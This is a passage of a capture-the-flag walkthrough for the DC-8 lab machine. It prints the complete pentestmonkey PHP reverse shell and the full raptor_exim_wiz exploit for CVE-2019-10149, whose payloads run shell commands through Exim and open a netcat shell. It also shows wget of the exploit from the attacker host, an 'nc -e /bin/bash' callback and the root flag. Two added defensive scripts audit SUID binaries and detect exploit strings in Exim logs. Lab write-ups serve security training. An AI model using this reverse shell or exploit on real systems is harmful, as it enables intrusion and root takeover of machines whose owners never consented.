// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.6'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

Edit

Save

Listen on Kali

root@JIYE:~# nc -nvlp 1234
listening on [any] 1234 ...

Submit the form

Kali gets a shell

root@JIYE:~# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 38376
Linux dc-8 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64 GNU/Linux
11:58:10 up 1:26, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Upgrade the shell

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$

www-data@dc-8:/$

Upgrade to a fully interactive shell

www-data@dc-8:/$ ^Z
[1]+ 已停止 nc -nvlp 1234
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 1234

www-data@dc-8:/$
www-data@dc-8:/$ whoami
www-data
www-data@dc-8:/$ pwd
/
www-data@dc-8:/$

0x10. Privilege escalation

SUID privilege escalation: exim4 has the SUID bit set

www-data@dc-8:/$ find / -perm -4000 2>/dev/null 
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/$
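The find listing above is exactly what an administrator should be comparing against a known-good baseline: the one entry that does not belong to a stock Debian install here is /usr/sbin/exim4. The script below is an added example (not part of the DC-8 write-up) that shows how to automate that comparison. The baseline is constructed from the write-up's own listing with exim4 left out, the sample listing adds a hypothetical root-owned helper at /tmp/pwned (the path the exploit's setuid method uses), and both are assumptions for the demo, not data captured from the box.

```shell
#!/bin/sh
# Added example, not from the DC-8 write-up: audit SUID binaries against a baseline.
# The write-up finds /usr/sbin/exim4 among the SUID files; this script shows how an
# administrator would spot such an addition automatically instead of by eye.

# Constructed baseline (assumption): the SUID set from the write-up's listing with
# exim4 left out, standing in for what a freshly installed image of the same release reports.
SUID_BASELINE="/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount"

# suid_scan ROOT...: list regular files with the SUID bit under the given roots,
# staying on one filesystem per root (-xdev) so /proc and network mounts are skipped.
suid_scan() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null | sort
}

# suid_unexpected LISTING: print each path from the newline-separated LISTING that is
# not in SUID_BASELINE. Whole-line fixed-string matching (grep -Fx) is deliberate:
# a substring test would treat /bin/su as a match for /usr/bin/sudo.
suid_unexpected() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# suid_in_scratch LISTING: flag SUID files in world-writable scratch directories, which
# is where a privilege-escalation helper like the exploit's /tmp/pwned would appear.
suid_in_scratch() {
    printf '%s\n' "$1" | grep -E '^/(tmp|var/tmp|dev/shm)/' || true
}

# Constructed listing: the `find / -perm -4000` output shown in the write-up plus a
# hypothetical root-owned SUID copy at /tmp/pwned, so both checks have something to report.
SAMPLE_LISTING="/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
/tmp/pwned"

# Demo on the constructed sample; on a live host pass "$(suid_scan /)" instead.
echo "Unexpected SUID binaries:"
suid_unexpected "$SAMPLE_LISTING"
echo "SUID files in scratch directories:"
suid_in_scratch "$SAMPLE_LISTING"
```

On the sample it reports /usr/sbin/exim4 and /tmp/pwned as unexpected and /tmp/pwned as a scratch-directory SUID file. Running suid_scan / from cron and diffing against the baseline is the cheap way to notice that a mail transfer agent has been installed SUID root on a web server where it has no business being.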

Check the exim4 version: it is 4.89

www-data@dc-8:/$ exim4 --help
Exim is a Mail Transfer Agent. It is normally called by Mail User Agents,
not directly from a shell command line. Options and/or arguments control
what it does when called. For a list of options, see the Exim documentation.
www-data@dc-8:/$
www-data@dc-8:/$ exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
www-data@dc-8:/$

Google exim4 4.89 exploit

Copy the source

root@JIYE:~/vulnhub/dc8# cat exim.sh
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
echo "$0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}

# payload delivery
function exploit()
{
# connect to localhost:25
exec 3<>/dev/tcp/localhost/25

# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in {1..31}
do
echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
case $1 in
-m) shift; METHOD="$1"; shift;;
* ) usage
;;
esac
done
if [ -z $METHOD ]; then
usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

# prepare a setuid shell helper to circumvent bash checks
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
if [ $? -ne 0 ]; then
echo "Problems compiling setuid shell helper, check your gcc."
echo "Falling back to the /bin/sh method."
cp /bin/sh /tmp/pwned
fi
echo

# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_SETUID
exploit
echo

# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_NETCAT
exploit
echo

# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
nc -v 127.0.0.1 31337

# print help
else
usage
fi
root@JIYE:~/vulnhub/dc8#
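Two things in the last two steps are worth turning into checks a defender can run: the version banner (4.89 sits inside the 4.87 to 4.91 range the exploit header names for CVE-2019-10149) and the shape of the payload, a recipient address carrying a ${run{...}} string expansion. The script below is an added example, not code from the write-up or from the exploit's author. The banner text is the one printed above; the log lines are constructed in the style of an Exim mainlog and are not captured from DC-8, and the helper names are my own.

```shell
#!/bin/sh
# Added example, not from the DC-8 write-up or the exploit's author: two defensive
# checks for CVE-2019-10149, which the exploit header describes as affecting Exim
# 4.87 through 4.91 through improper validation of the recipient address.

# exim_version_from_banner TEXT: pull the dotted version out of `exim4 --version`
# output ("Exim version 4.89 #2 built ..." in the write-up).
exim_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^Exim version \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# exim_version_vulnerable VERSION: true when VERSION lies in the affected range
# 4.87-4.91. Only major and minor are compared; a suffix such as "4.89.1" is ignored.
# A distribution build that backported the fix keeps the old number, so treat a hit
# as "check the package changelog", not as proof of exposure.
exim_version_vulnerable() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    minor=${minor%%[!0-9]*}
    [ "$major" = 4 ] && [ "${minor:-0}" -ge 87 ] && [ "$minor" -le 91 ]
}

# exim_suspicious_recipients LOG: print log lines whose recipient carries a ${run{
# expansion, the signature of the payload delivered above. Fixed-string grep keeps
# the dollar sign and braces literal.
exim_suspicious_recipients() {
    printf '%s\n' "$1" | grep -F '${run{' || true
}

# Constructed samples (not captured from DC-8): the banner as printed in the write-up
# and three mainlog-style lines, one of which carries a ${run{...}} recipient.
BANNER="Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017"
SAMPLE_LOG='2020-08-31 12:40:02 1kCZk0-0000Hq-2A <= alice@example.test H=localhost [::1] for bob@example.test
2020-08-31 12:48:46 1kCZsE-0000Ie-4N <= <> H=localhost [::1] for ${run{/bin/sh -c "..."}}@localhost
2020-08-31 12:49:00 1kCZk0-0000Hq-2A => bob <bob@example.test> R=local_user T=mail_spool'

# Demo on the constructed samples; on a live host feed it `exim4 --version` and
# /var/log/exim4/mainlog instead.
VERSION=$(exim_version_from_banner "$BANNER")
if exim_version_vulnerable "$VERSION"; then
    echo "Exim $VERSION is inside the CVE-2019-10149 range (4.87-4.91): verify the fix is applied"
fi
echo "Log lines with \${run{ in the recipient:"
exim_suspicious_recipients "$SAMPLE_LOG"
```

The log check is the more useful of the two after the fact: a legitimate recipient address never contains a string-expansion operator, so a single ${run{ in the mainlog is a high-confidence indicator that the exploit was delivered, whether or not the setuid or netcat payload succeeded.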

Upload the exploit

root@JIYE:~/vulnhub/dc8# ls
exim.sh nmap.demo nmap.sP re.php user.txt
root@JIYE:~/vulnhub/dc8# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.3 - - [30/Aug/2020 22:26:17] "GET /exim.exp HTTP/1.1" 200 -

www-data@dc-8:/tmp$ wget http://192.168.1.6/exim.sh
--2020-08-31 12:26:18-- http://192.168.1.6/exim.sh
Connecting to 192.168.1.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3547 (3.5K) [application/octet-stream]
Saving to: 'exim.exp'

exim.exp 100%[===================>] 3.46K --.-KB/s in 0s

2020-08-31 12:26:18 (111 MB/s) - 'exim.exp' saved [3547/3547]

www-data@dc-8:/tmp$ ls
exim.sh

Run it

www-data@dc-8:/tmp$ ./exim.sh 

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Mon, 31 Aug 2020 12:48:46 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1kCZsE-0000Ie-4N
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Aug 31 12:48 /tmp/pwned
$

Run it with arguments

$ ./exim.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 31 Aug 2020 12:50:17 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1kCZth-0000Ix-1C
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open

Listen on Kali

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

Reverse shell

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
nc -e /bin/bash 192.168.1.6 6666
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 59564
whoami
root
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
ls
flag.txt
cat flag.txt








Brilliant - you have succeeded!!!



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888



Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
-------------Paper is short but the feeling runs long; see you next time-------------